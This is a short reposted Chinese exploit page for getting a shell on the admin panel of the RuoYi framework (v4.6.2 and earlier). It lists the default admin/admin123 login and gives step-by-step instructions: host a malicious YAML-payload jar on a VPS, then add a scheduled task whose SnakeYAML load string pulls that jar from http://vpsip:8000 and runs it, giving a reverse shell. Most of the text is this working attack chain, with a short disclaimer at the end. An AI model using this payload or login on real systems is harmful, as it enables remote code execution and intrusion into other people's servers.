相关内容简体繁体

若依后台Getshell

本文转载自查看原文 2021-12-08 14:32 8763 漏洞复现

后台Getshell

RuoYi <= v4.6.2
默认admin/admin123
修改artsploit
windows主机反弹shell可以用https://github.com/bkfish/yaml-payload-for-Win
放到vps上，起一个python3
python3 -m http.server
配置完后，后台添加定时任务
org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://vpsip:8000/yaml-payload.jar"]]]]')
然后Con表达式设置成0/50 * * * * ?即可

历史漏洞：
https://doc.ruoyi.vip/ruoyi/document/kslj.html#历史漏洞
新增:
https://xz.aliyun.com/t/10637

免责声明！

本站转载的文章为个人学习借鉴使用，本站对版权不负任何法律责任。如果侵犯了您的隐私权益，请联系本站邮箱yoyou2525@163.com删除。

猜您在找 Wordpress 后台GetShell总结 zblog后台getshell 网站后台getshell 通达OA后台getshell phpcms后台getshell weblogic弱口令+后台getshell Tomcat 后台war包getshell 【实战】Tomcat管理后台Getshell Eyoucms 1.42 后台插件getshell 【实战】Axis2后台Getshell

粤ICP备18138465号 © 2018-2025 CODEPRJ.COM